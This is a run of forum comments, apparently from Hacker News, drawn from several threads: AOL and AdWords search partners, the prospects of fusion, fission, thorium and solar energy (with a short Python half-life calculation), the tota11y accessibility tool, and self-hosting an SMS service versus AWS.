Anyone who had to deal with the billing headaches at a search agency <raises hand> does not look fondly at that time.
I wonder what this will do to Search Partner Network performance for AdWords customers. AOL represented one of the biggest (if not THE biggest) search partners.
The Search Partner Network is one of the few areas of AdWords that is still a black box wrt placement-level performance (unlike the GDN). Previously the only way to get visibility into the AOL portion of it was to run directly with AOL using AOL's licensed version of the AdWords UI, but with some minor differences in how you used it.
If the biggest volume driver of Search Partner volume goes >poof< I'd expect that to noticeably impact performance for Search Partner traffic. Would love an official comment from Google on this here, on their blog, or through industry pubs like SearchEngineLand.
So instead of layoffs, they're just selling their employees*?
(Uber deal): https://news.ycombinator.com/item?id=9799997
Meanwhile, solar/wind is heading toward dirt cheap and trivial to set up. Environmental impact is minimal, too. It doesn't require giant corporations, government sponsorship, complex regulations, or exotic engineering skills to implement. With those incredible advantages, it doesn't need to be cheaper than nuclear - it just needs to be adequately cheap.
What?!? I certainly appreciate the ambition, but humanity has spent seven decades and at least hundreds of billions of dollars on this very same project. What in the world is this tiny startup doing with a $5mm grant that is so easy and cheap that could possibly lead to that kind of breakthrough in fusion energy?
That's what you can't do with solar - with solar you already have a big footprint to power that first factory, and your footprint increases in proportion to power use. The 21st century calls for scaling roughly 20x = 2x (population growth) * 10x (rise in the developing world's living standards). I don't want a 20x solar footprint.
Of particular concern in nuclear waste management are two long-lived fission products, Tc-99 (half-life 220,000 years) and I-129 (half-life 15.7 million years), which dominate spent fuel radioactivity after a few thousand years. The most troublesome transuranic elements in spent fuel are Np-237 (half-life two million years) and Pu-239 (half-life 24,000 years). Nuclear waste requires sophisticated treatment and management to successfully isolate it from interacting with the biosphere. This usually necessitates treatment, followed by a long-term management strategy involving storage, disposal or transformation of the waste into a non-toxic form. Governments around the world are considering a range of waste management and disposal options, though there has been limited progress toward long-term waste management solutions.
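To get a feel for those timescales, the surviving fraction after t years is N/N0 = 2^(-t/half_life); a quick back-of-the-envelope using the half-lives quoted above:

  half_lives = {'Tc-99': 220_000, 'I-129': 15_700_000,
                'Np-237': 2_000_000, 'Pu-239': 24_000}   # years, as quoted above

  t = 10_000  # years, longer than all of recorded history
  for isotope, hl in half_lives.items():
      print(isotope, '%.1f%% remaining' % (100 * 2 ** (-t / hl)))
  # Pu-239 is down to ~75%; the longer-lived nuclides are essentially untouched,
  # which is why they dominate spent-fuel radioactivity after a few thousand years.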
Individual solar panels and batteries, personal windmills, personal reactors, etc.
Imagine all the savings in infrastructure for energy transportation, and the reinvestment in other sectors. Imagine all the possibilities if people could switch their energy generation model as simply as buying a new product and installing it at home.
Individual energy independence, even if it will never be possible, that's where our dreams should be.
Then water, then food. That's disruption at seismic level. Post-scarcity world.
It's worth pointing out that the problems enumerated above are partly the consequence of energy becoming cheap and available during the last century (coal, oil, etc.), not of a lack of it. But the main reasons are the dominating philosophical and ethical standards of humanity during the energy boom. Cheap energy + wrong philosophy = bad application of energy = the problems enumerated above.
So if you want to tackle any of those problems, you have to work on both variables in that equation, just increasing the availability of energy without raising awareness of how to apply it, will lead to unsatisfactory results in the long term.
This makes a lot of sense.
Can anyone point out current research on this field? I don't seem to hear much about it.
Edit: Just found this after searching #photosynthesis in Twitter: http://www.huffingtonpost.com/2015/04/20/artificial-photosyn...
It's silly to describe solar as atomic energy from the sun's fusion as a distinct category from carbon-based energy, because of course carbon-based energy was formed by capturing solar energy from the sun's fusion.
Kudos to Sam for putting not just his money, but his time where his mouth is. If only the rest of the internet could do the same!
Even if they do figure out how to get engineering and manufacturing in place, then there are regulatory barriers to figure out. There will be politics involved, and legal challenges. And of course, you need to actually operate the sites on an ongoing basis.
All of these challenges can be overcome... but most people who know how to do so already work in the energy industry. What is really needed is a group of people who can bridge those gaps to take an innovative design from an engineer's drawing board and jump through all the hoops to make it a live production site. If such a group were built, real change could happen very quickly.
The reason that China and India are the only countries going after fission is because of a singular element - Thorium. Both India and China have huge reserves of thorium that can be unlocked with molten salt reactors that are unviable anywhere else in the world (including the US, which gave up on this a long time ago). Australia does have large reserves of thorium, but its projected energy needs are dwarfed by India and China's.
China is way ahead of India on this front, with more than a billion dollars managed by Jiang Mianheng to conduct research into these new reactors. And which is why India is bending over backwards to sign the India-US Civil Nuclear Energy treaty.
Interestingly, a US company, ThorCon, has built a "hackable" MSR - though I don't know if it is any good.
 http://fortune.com/2015/02/02/doe-china-molten-salt-nuclear-... http://fukushimaupdate.com/thorium-molten-salt-reactors-to-g...
I don't see any future for nuclear unless it fundamentally changes the way it harvests energy and solves the nuclear waste problem economically.
I would love to work on a project like this.
Not sure what 'sama means by this, but I guess it's what I feel - government projects tend to go slow unless there's an actual, real security reason for them to go faster, in which case - like with Manhattan project - you get crazy amount of productivity and progress.
Are we talking public cost? Because that's all that matters. So far the public cost of nuclear power has been extraordinary, due to accidents and waste.
I understand that some of these startups aim to process existing waste in relatively small distributed reactors but what is the public cost of spreading a bunch of "mini" toxic waste sites around the world that remain hazardous for 100 years, instead of centrally storing it?
Plus I've read that although these mini reactors are not directly producing material that could be used in a dirty bomb, that they could be converted to do so if they fell into the wrong hands. I may be oversimplifying here, but the question again is what is the public risk of distributing atomic fuels and reactors in a manner that makes them much less secure? Would this make them more susceptible to "war hacking" and could this be the mini-reactor equivalent of a nuclear disaster?
Nuclear costs have always been about the long term public costs, not the short term $/kWh.
This is before we even consider the taxpayer cost that's gone into nuclear tech development. I wonder if there will be more public money needed to take this tech to market, even if the test reactors bear fruit.
Does anyone know the current story? Can renewables scale up fast enough? Also, does the availability problem (i.e., renewables not being available when the sun/wind are not) prevent them from having a sufficient impact? I could imagine that, even if renewables weren't always available, their use still could reduce greenhouse gas emissions enough to mitigate climate change sufficiently.
I couldn't agree more with Sam about the importance of energy for our civilization. Kudos to him for putting his efforts towards important stuff.
I have mixed, but mostly positive feelings about venture capital and energy startups. The fact is, it's a tough space. Large capital requirements, prototyping cycles often measured in years, and a low success rate. Everyone is still waiting for the energy unicorn to put Google, Uber, Yahoo, et al. to shame. And energy startups don't benefit from many of the things in SV that infotech startups do, such as ecosystem synergies and being co-located with all the new cool stuff in your industry. This is especially true with regards to one of SV's great strengths, the freedom to fail.
Where SV shines is in the short time from idea to testing. In most of the nuclear energy industry, going from idea to tested prototype can take decades. I think we all know the importance of short debugging and feedback cycles. Hirsch harped on this a few years back, and it's still a good point. Look at ITER, which we were talking about back in 1995. ITERative, it is not.
1) The teams and funding are a bit larger than they used to be. This is probably a good thing. The design turnaround time is a bit better, but not by much though. It's necessary to tweak a design once you have built it to learn from it and see what its ultimate performance can be. But it's all-too-easy to spend a year or two doing that. Do that a few times and then you're out (of money, time, your mind, what-have-you).
2) Location. There is no advantage to locating an energy company in SV except for proximity to funding (and Stanford, I suppose). We located by the NHMFL in Tallahassee. It's cheaper, and the magnet guys would moonlight for us. However, working with Tim over 3 time-zones had its challenges. I don't think we got the benefit of having a great VC as much as some of his other portfolio companies did (no complaints about him, just the distance). Some things are just hard to explain over the phone. But SV still isn't the right place. I think that there is a big opportunity for VCs to improve how they provide the value-added stuff that they do (beyond providing money) remotely, and energy is the space that needs it most. I don't know the VC job well enough to provide good suggestions, I just know there is an unmet need here.
3) Because the failure rate for startups is so high, it's important to have a decent failure path for the people involved. For software devs, SV jobs often provide a soft landing. Energy guys don't have that easily transferable skill set. So, fusion largely consists of old hands who are willing to spend 20 years ramming a single design through, and a bunch of young redshirts who are sure that they can beat the odds. When every design failure becomes a career failure, people aren't incentivized to radically iterate designs quickly. Luckily for me, I learned radiation measurement and protection on the job (hey, we have neutrons! How many neutrons? Woo hoo! Wait, oh shit!) so that skill transferred over into medical physics quite readily. But imagine what SV would look like if almost every software startup founder who failed once had left the software industry.
I wish good luck to Helion, UPower, and all the other teams fighting the good fight.
(Of course it's far better for the environment than present coal/petrol/gas/wood, and their energy initially came from the sun anyway, but it will still have some environmental impact.)
Large claims with no hard data comparisons? (e.g., atomic power has major cost, density, and predictability advantages)
>There will only be one cheapest source of energy
Really? There can't be two sources at or near equilibrium?
These systems are not deployed in isolated, designer environments, but instead are deployed in complex environments. Transportation and project logistics will prefer some sources over others.
The lack of any real metric for cost or "cheapness" is a red flag. Is cost being measured in nominal dollars? Will such a thing even exist in the 22nd century?
Energy is a tiny component of modern civilization.
I built this utility with the help of two colleagues after working on accessibility at Khan Academy for a few weeks, and seeing first-hand the process of evangelizing accessibility on a dev team. Our automated tests were far from approachable (and became more annoying than helpful), so we built tota11y to make the manual testing experience more interactive and educational (we like teaching things).
I touch on this in our engineering blog.
Anyway, super thrilled to see tota11y near the top of HN this morning, and happy to answer any questions you may have.
I'm not a web developer (I do desktop/server software development), so I have no idea how or why certain pages implement this policy/style. It just seems a little arbitrary to choose a font size for your site and not allow visitors to zoom-in in case they have trouble reading the text.
While minimised, the tab could display a score like A+ - this could incentivise websites to permanently present it on their pages as a badge of pride (while ensuring visibility to any changes that degrade the score).
Secondly, if you link to the project within the maximised tab, you'll likely see greater adoption.
Very handy having things like these as bookmarks.
The script will be loaded only if an admin user is logged in, so you can rest assured this will not annoy your users.
edit: Never mind, made a quick one for myself seeing that's MIT licensed https://gist.github.com/liviu-/62e8ce91b8723ef1a10a
I run a similar service, but for SMS messaging, that is 21 CFR 11 compliant. We rent a quarter rack with our own door/lock and throw in pretty much disposable servers as needed. It's much cheaper than doing the equivalent on AWS, and it's not that difficult to set up your own secure servers once you have a few recipes to follow.
We started it about 9 years ago, before a secure service with Amazon existed. Every year or two I price alternative solutions like AWS's secure service, VPCs, etc., and it's always cheaper, even taking into account my labor, to stick with our quarter rack. In fact, it seems they base their costs on the going rate for rack space, plus a premium for the convenience of using their servers.
Oh, and it's funny - we have almost the same number of users, and we're processing more messages per month than them, all on an old-fashioned webserver-appserver-dataserver arrangement - three servers (not counting failover redundancy) - and it's barely breaking a sweat.
Seems like a very low efficiency in either the hardware or the software. We run a comparable service with roughly 2 million messages per day in a 6 server dedicated cluster.